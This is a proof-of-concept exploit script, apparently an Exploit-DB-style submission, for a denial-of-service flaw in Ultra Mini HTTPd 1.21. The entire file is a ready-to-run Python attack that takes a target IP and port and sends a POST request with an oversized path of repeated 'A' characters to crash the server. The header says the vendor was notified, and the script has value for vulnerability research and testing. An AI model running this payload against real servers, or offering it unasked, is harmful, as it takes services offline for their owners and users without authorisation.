# Exploit Title: Ultra Mini HTTPd 1.21 - POST - Denial of Service (DoS)
# Discovery by: Fagner Lima - Aka r3ng4f
# Discovery Date: 2024-1016
# Vendor Homepage: https://acme.com/
# Software Link: https://acme.com/
# Notification vendor: Yes reported
# Tested Version: Ultra Mini HTTPd 1.21
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
import socket
import sys
import os
# Clear the console depending on the system
def clear_console():
if os.name == 'nt': # For Windows
os.system('cls')
else: # For Mac and Linux
os.system('clear')
# Intro text
def intro():
print("***************************************************")
print("* Ultra Mini HTTPd 1.21 - Denial of Service *")
print("* *")
print("* Coded by Fagner Lima - Aka r3ng4f *")
print("* *")
print("* e-mail: fagner.alex@gmail.com *")
print("* *")
print("***************************************************")
# Main function to handle IP and port arguments
def main():
if len(sys.argv) != 3:
print("\nUsage: {} <ip> <port>".format(sys.argv[0]))
sys.exit(-1)
ip = sys.argv[1]
port = int(sys.argv[2])
return ip, port
# Function to exploit the vulnerability
def exploit(ip, port):
print("[+] Exploiting...")
buffer = "\x41" * 192
payload = 'A' * 5438 + buffer
try:
# Connect to the server
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((ip, port))
request = f"POST / {payload} HTTP/1.1\r\nHost:{ip}\r\n\r\n"
s.send(request.encode())
print("[+] Exploit sent successfully!")
except Exception as e:
print(f"[-] Failed to connect: {e}")
# Run the exploit
if __name__ == "__main__":
clear_console()
intro()
ip, port = main()
exploit(ip, port)